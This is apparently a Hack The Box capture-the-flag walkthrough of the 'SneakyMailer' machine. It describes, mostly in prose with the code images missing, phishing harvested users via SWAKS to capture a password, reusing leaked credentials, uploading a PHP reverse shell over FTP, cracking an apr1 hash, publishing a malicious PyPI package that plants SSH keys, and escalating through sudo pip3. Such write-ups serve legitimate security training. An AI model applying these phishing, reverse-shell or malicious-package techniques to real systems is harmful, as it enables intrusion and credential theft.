SneakyMailer — HTB Walktrough
What ?? Another part of Sneaky HTB box ??? Might be. But was fun to solve it. Real life phishing attack practice. User part was definitely a level up. Let’s start.

ENUMERATION
Full port nmap scan for TCP ports reveals following


PORT 21 FTP Enumeration
— — anonymous login failed
PORT 80 HTTP ENUMERATION
Visiting website

Add to /etc/hosts


We get 3 info
— — Pip install can install python modules on server
— — We have to read mails for further exploitation
— — We get some username in teams and messages

Viewing source code we can see messages

Teams






Now normal enumeration like directory busting and all , gave us nothing of importance.
Failed Logics:
1) I am getting nothing on HTTP — gobuster etc.
2) I tried SMTP enum , it would be basically using username files and testing which exits, doing this won’t be of use I guess, because we already have users from HTTP port.
3) IMAP — to read mails, I need to login as any user , I don’t have creds of any till now
4) ftp anonymous login failed :(
Now what can we do? This box asks us to think logically. What about email harvesting and phishing attempt. Since we already have harvested emails by PORT 80 HTTP enumeration. We can now try to send some phishing mails. Let’s see how.
PORT 25 SMTP ENUMERATION
First of all let’s collect a list of emails and users separately.



EXPLOITATION
We will use SWAKS (can be downloaded from github) , to send the mails . For this first open netcat at port 80. We will send a phishing mail to users, to click on the link containing link to our IP, even if a single one clicks, we may get something juicy.


While on netcat at port 80 we can see, the user Paul reverted us back

Username : Paul && Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
I used evolution client for kali to see mails

Setup Evolution, by signing in as paul, to read mails, using his email and his password we got just now.
Mails

Hello administrator, I want to change this password for the developer account. Username: developer && Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C ;Please notify me when you do it
another mail is about python and PyPI.

The password worked for ftp we got worked for FTP
FTP Enumeration
Login in FTP using above username password


Register.php

I initially thought of registering as a user via curl request, but no we don’t have to do it . It is a rabbit hole.
Then what? can we upload files on server using PUT, I used php-reverse-shell by pentest monkey

But where to access it ??? time for subdomains and directory bursting. But we have already busted directories, so we can look for subdomains.

Wfuzzing sub domains I got dev.sneakycorp.htb


POST EXPLOITATION
Now that we are www-data, it’s time to get user

Let’s enumerate.We already know what it is in dev.sneakycorp.htb- the same content we see in ftp, now we see pypi.sneakycorp.htb — something new

Username: pypi
Password hash : $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Seems april hash; Let’s crack it using hashcat


Let’s see what is happening on port 8080,which was open

Lot’s of connection on localhost:8080, Also on visitng pypi.sneakycorp.htb:8080/, I see

When I tried to access packages , I see we require to authenticate as user: pypi

Let’s use the creds we have

Seems no package is there.Same with “simple”
https://packaging.python.org/tutorials/packaging-projects/#generating-distribution-archives
Let’s create a package in tmp directory

Nano and Vi did not work , so I made these files on my system and wget it.
First create a pair of ssh keys so that you can ssh into low, using your private key.

Wget all files under sample_package. Contents must look like this.

/README.md and /setup.cfg

/Setup.py and /sample_package/__init__.py

Now that our package is ready, we need to deploy it
1) compress it using sdist

Create a .pypirc in HOME folder
For this first export HOME folder to /tmp/sample_package : requirement of pypirc is it should be in home folder of user. Then wget the file as previous ones.



We see we have keys added to our low’s home directory

Ssh into low

PRIVILEGE ESCALATION
Easiest part of whole machine was escalating privilege.

We can exploit sudo on pip , using gtfobins


After a thinking a lot, I see that we can run pip3 not pip as sudo.

ROOTED!!!